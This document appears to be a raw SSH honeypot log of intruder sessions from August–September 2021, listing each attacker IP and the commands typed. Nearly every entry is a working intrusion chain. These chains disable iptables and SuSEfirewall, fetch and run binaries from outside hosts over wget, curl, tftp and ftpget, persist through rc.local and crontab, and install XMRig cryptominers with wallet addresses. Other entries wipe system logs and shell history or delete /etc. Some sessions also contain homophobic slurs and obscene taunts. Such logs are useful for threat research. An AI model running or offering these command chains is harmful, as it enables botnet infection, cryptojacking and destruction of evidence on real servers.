echo "cd /tmp/">>/etc/rc.local
echo "./hhgg
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/hhgg;chmod 777 hhgg;./hhgg;echo "cd /tmp/">>/etc/rc.local;echo "./hhgg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/hhgg
chmod 777 hhgg
./hhgg
echo "cd /tmp/">>/etc/rc.local
echo "./hhgg
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.167 14-Aug-2021 09:05:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8123/lsyyds;chmod 777 lsyyds;./lsyyds;echo "cd /tmp/">>/etc/rc.local;echo "./lsyyds&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8123/lsyyds
chmod 777 lsyyds
./lsyyds
echo "cd /tmp/">>/etc/rc.local
echo "./lsyyds
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.61.41 16-Aug-2021 16:17:34 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 179.43.141.99 16-Aug-2021 19:08:36 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 142.93.255.119 16-Aug-2021 22:11:11 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.254.247.214/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 23.254.247.214 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 23.254.247.214; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.254.247.214/Heisenbergbins.sh
chmod 777 Heisenbergbins.sh
sh Heisenbergbins.sh
tftp 23.254.247.214 -c get Heisenbergtftp1.sh
chmod 777 Heisenbergtftp1.sh
sh Heisenbergtftp1.sh
tftp -r Heisenbergtftp2.sh -g 23.254.247.214
chmod 777 Heisenbergtftp2.sh
sh Heisenbergtftp2.sh
rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh
rm -rf *

From 50.212.157.1 17-Aug-2021 16:18:50 ssh2 root
w
lscpu
ip a
netstat -antop
last
lastlog
yum
id richard
halt
exit suck my dick you faggot :)))
exit

From 50.212.157.1 17-Aug-2021 16:20:13 ssh2 root
wall
>>> Your pathetic hacking attempt session has been logged <<<
id richard
you see stupid fuck ... when you id richard you honeyshit tells the truth ... so ... ?? what atempt ....
wget suckmycook.com/youwantsomethinghere.tgz
wget richardisashitHONEYPOTuser.com/suckmyass

From 125.64.43.36 17-Aug-2021 20:14:35 ssh2 root
Exec echo -n juvymabm|md5sum;uname -a
echo -n juvymabm|md5sum
uname -a

From 209.141.61.41 18-Aug-2021 15:26:54 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 179.43.141.99 20-Aug-2021 15:56:29 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL; pkill Xorg; pkill x86_64;
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL
pkill Xorg
pkill x86_64

From 209.141.48.211 21-Aug-2021 06:32:58 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 205.185.123.172/x86_64; chmod 777 *; ./x86_64 hraz.x86; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 205.185.123.172/x86_64
chmod 777 *
./x86_64 hraz.x86
rm -rf *

From 118.34.86.75 21-Aug-2021 09:43:43 ssh2 root
Exec top
top

From 209.141.48.211 21-Aug-2021 23:36:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 205.185.123.172/x86_64; chmod 777 *; ./x86_64 hraz.x86; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 205.185.123.172/x86_64
chmod 777 *
./x86_64 hraz.x86
rm -rf *

From 180.215.194.46 22-Aug-2021 03:57:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/x86_64
chmod 777 x86_64
./x86_64

From 106.75.146.233 22-Aug-2021 07:13:22 ssh2 root
Exec ls /home
ls /home

From 213.233.88.52 23-Aug-2021 09:15:32 ssh2 root
python
apt-
apt-get install python3
python3
python
uname -a
id

From 185.53.199.45 23-Aug-2021 09:42:49 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd
ls
python

From 136.144.41.152 23-Aug-2021 11:23:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/hkfndfns; curl -O http://109.104.151.112/hkfndfns; chmod 777 hkfndfns; chmod +x hkfndfns; ./hkfndfns Exploit.x86; rm -rf hkfndfns; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/hkfndfns
curl -O http://109.104.151.112/hkfndfns
chmod 777 hkfndfns
chmod +x hkfndfns
./hkfndfns Exploit.x86
rm -rf hkfndfns
history -c

From 209.141.61.41 24-Aug-2021 05:05:29 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cd /tmp
rm -rf x86*
wget http://205.185.123.172/x86_64
chmod 777 *
./x86_64 fw.x86

From 130.162.113.6 24-Aug-2021 14:58:21 ssh2 root
Exec echo -n 0pwpmcmz|md5sum;uname -a
echo -n 0pwpmcmz|md5sum
uname -a

From 178.138.99.190 24-Aug-2021 21:27:57 ssh2 root
w
lscpu
id richard
halt
cd /etc
rm -rf *
wget suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook

From 209.141.61.41 25-Aug-2021 18:31:35 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; ./x86_64 fw.x86
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cd /tmp
rm -rf x86*
wget http://205.185.123.172/x86_64
chmod 777 *
./x86_64 fw.x86

From 180.215.194.46 26-Aug-2021 06:10:34 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/lin;chmod 777 lin;./lin;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/lin
chmod 777 lin
./lin
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/lin;chmod 777 lin;./lin;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/lin
chmod 777 lin
./lin

From 209.141.54.197 26-Aug-2021 12:03:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.94.7/wget.sh; curl -O http://107.175.94.7/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 107.175.94.7 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.94.7; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.94.7 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.94.7/wget.sh
curl -O http://107.175.94.7/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 107.175.94.7 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.94.7
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.94.7 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 178.138.99.190 26-Aug-2021 14:47:38 ssh2 root
w
lscpu
history
id richard
cawget suckmydickwget suckmydickfaggot.com/bigdick
wget suckmydickwget suckmydickfaggot.com/bigdick
halt

From 59.56.77.6 27-Aug-2021 07:09:50 ssh2 root
Exec crontab -l | { cat; echo "0 4 * * * cd /root;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:280/linv2;chmod 777 linv2;./linv2"; }|crontab -
crontab -l | { cat
echo "0 4 * * * cd /root
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:280/linv2
chmod 777 linv2
./linv2"
}|crontab -

From 59.56.77.6 27-Aug-2021 09:58:02 ssh2 root
Exec crontab -r
crontab -r

From 59.56.77.6 27-Aug-2021 10:04:14 ssh2 root
Exec yum install crontab
yum install crontab

From 59.56.77.6 27-Aug-2021 10:09:51 ssh2 root
Exec opt install crontab
opt install crontab

From 178.138.99.190 27-Aug-2021 10:24:26 ssh2 root
w
lscpu
id richard
h
halt
wget suckmydickyoufaggot.ro/bigrodick

From 59.56.77.6 27-Aug-2021 15:11:46 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:280/linv2;chmod 777 linv2;./linv2;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:280/linv2
chmod 777 linv2
./linv2

From 209.141.61.41 27-Aug-2021 21:28:55 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 209.141.51.176/x86_64; chmod 777 x86_64; ./x86_64 hraz.x86xhed; rm -rf *; echo Hraztalag on top
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 209.141.51.176/x86_64
chmod 777 x86_64
./x86_64 hraz.x86xhed
rm -rf *
echo Hraztalag on top

From 59.56.77.6 28-Aug-2021 03:35:58 ssh2 root
Exec crontab -l | { cat; echo "0 4 * * * cd /root;./linv2"; }|crontab -
crontab -l | { cat
echo "0 4 * * * cd /root
./linv2"
}|crontab -

From 82.165.236.132 28-Aug-2021 07:12:09 ssh2 root
Exec echo validd
echo validd

From 179.43.176.53 29-Aug-2021 21:57:19 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 109.104.151.106 30-Aug-2021 13:51:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf *; wget http://cnc.betaalverzoek.ir/binInfect.sh; curl -O http://cnc.betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; bash binInfect.sh; ./binInfect.sh;  sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf *
wget http://cnc.betaalverzoek.ir/binInfect.sh
curl -O http://cnc.betaalverzoek.ir/binInfect.sh
chmod 777 binInfect.sh
bash binInfect.sh
./binInfect.sh
sh binInfect.sh
tftp betaalverzoek.ir -c get binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp -r binInfect2.sh -g betaalverzoek.ir
chmod 777 binInfect2.sh
sh binInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh
sh binInfect1.sh
rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh
rm -rf *

From 154.220.3.36 1-Sep-2021 02:26:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 154.220.3.36 1-Sep-2021 02:34:52 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/HU;chmod 777 HU;./HU;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/HU
chmod 777 HU
./HU
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/HU;chmod 777 HU;./HU;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/HU
chmod 777 HU
./HU

From 199.19.226.145 2-Sep-2021 07:21:41 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://185.150.117.103/x86_64; curl -O http://185.150.117.103/x86_64; chmod 777 *; ./x86_64 x86_64; pkill xmirg; pkill Xorg; pkill Opera; pkill x86
cd /tmp
rm -rf x86_64
wget http://185.150.117.103/x86_64
curl -O http://185.150.117.103/x86_64
chmod 777 *
./x86_64 x86_64
pkill xmirg
pkill Xorg
pkill Opera
pkill x86

From 209.141.61.41 2-Sep-2021 12:10:44 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 209.141.51.176/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 209.141.51.176/x86_64
chmod 777 x86_64
./x86_64 x86xhed
rm -rf *

From 199.19.226.145 2-Sep-2021 18:39:13 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://185.150.117.103/x86_64; curl -O http://185.150.117.103/x86_64; chmod 777 *; ./x86_64 x86_64; pkill xmirg; pkill Xorg; pkill Opera; pkill x86
cd /tmp
rm -rf x86_64
wget http://185.150.117.103/x86_64
curl -O http://185.150.117.103/x86_64
chmod 777 *
./x86_64 x86_64
pkill xmirg
pkill Xorg
pkill Opera
pkill x86

From 154.82.75.148 3-Sep-2021 06:59:57 ssh2 root
Exec sed -i '/linv3/d' /var/spool/cron/root
sed -i '/linv3/d' /var/spool/cron/root

From 154.82.75.148 3-Sep-2021 07:17:18 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/linv3;chmod 777 linv3;./linv3;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/linv3
chmod 777 linv3
./linv3

From 154.82.75.148 3-Sep-2021 07:19:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/linv5;chmod 777 linv5;./linv5;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/linv5
chmod 777 linv5
./linv5

From 154.82.75.148 3-Sep-2021 07:24:01 ssh2 root
Exec crontab -l | { cat; echo "0 5 * * * cd /root;./linv5"; }|crontab -
crontab -l | { cat
echo "0 5 * * * cd /root
./linv5"
}|crontab -

From 27.124.34.46 8-Sep-2021 00:23:34 ssh2 root
.

From 23.249.16.129 9-Sep-2021 04:10:44 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X

From 23.249.16.129 9-Sep-2021 05:02:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 9-Sep-2021 06:39:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 209.141.36.53 10-Sep-2021 02:35:18 ssh2 root
Exec apt update -y; yum update -y; apt install curl -y; yum install curl; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV
apt update -y
yum update -y
apt install curl -y
yum install curl
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV

From 209.141.36.53 10-Sep-2021 05:57:36 ssh2 root
Exec apt update -y; yum update -y; apt install curl -y; yum install curl; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
apt update -y
yum update -y
apt install curl -y
yum install curl
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 23.249.16.129 10-Sep-2021 22:46:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 10-Sep-2021 22:52:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 11-Sep-2021 21:23:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U

From 23.249.16.129 11-Sep-2021 21:28:56 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U

From 23.249.16.129 12-Sep-2021 09:14:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X

From 5.182.210.125 12-Sep-2021 17:31:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.226.72/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 45.14.226.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.226.72/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 45.14.226.72 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 209.141.36.53 12-Sep-2021 18:07:23 ssh2 root
Exec apt update -y; yum update -y; cd /tmp; rm -rf x86*; wget 107.189.7.16/x86_64; chmod 777 x86_64; ./x86_64 fw.x86; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV; cat /etc/issue
apt update -y
yum update -y
cd /tmp
rm -rf x86*
wget 107.189.7.16/x86_64
chmod 777 x86_64
./x86_64 fw.x86
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV
cat /etc/issue

From 209.141.36.53 13-Sep-2021 17:31:09 ssh2 root
Exec apt update -y; yum update -y; cd /tmp; rm -rf x86*; wget 107.189.7.16/x86_64; chmod 777 x86_64; ./x86_64 fw.x86; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; cat /etc/issue
apt update -y
yum update -y
cd /tmp
rm -rf x86*
wget 107.189.7.16/x86_64
chmod 777 x86_64
./x86_64 fw.x86
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue

From 8.38.148.45 17-Sep-2021 03:38:30 ssh2 root
unset HISTFILE
w
unset HISTFILE
uname -a
cat /etc/issue
ps x
wget
ps x
w

From 107.189.12.48 20-Sep-2021 01:07:24 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; wget http://188.213.49.167/i686; chmod 777 *; ./i686 i686; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
wget http://188.213.49.167/i686
chmod 777 *
./i686 i686
echo ur mama

From 45.133.1.14 21-Sep-2021 13:45:33 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 107.189.30.134 22-Sep-2021 22:02:54 ssh2 root
Exec wget 107.189.7.16/x86_64; chmod 777 *; ./x86_64 fw.x86
wget 107.189.7.16/x86_64
chmod 777 *
./x86_64 fw.x86

From 178.138.97.130 24-Sep-2021 11:00:23 ssh2 root
w
lsccpu
lscpu
history
wget
uname -a
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
rm -rf /root/.bash_history
touch /root/.bash_history
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /etc/cron.d/core*
wget 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
cd /home
ls
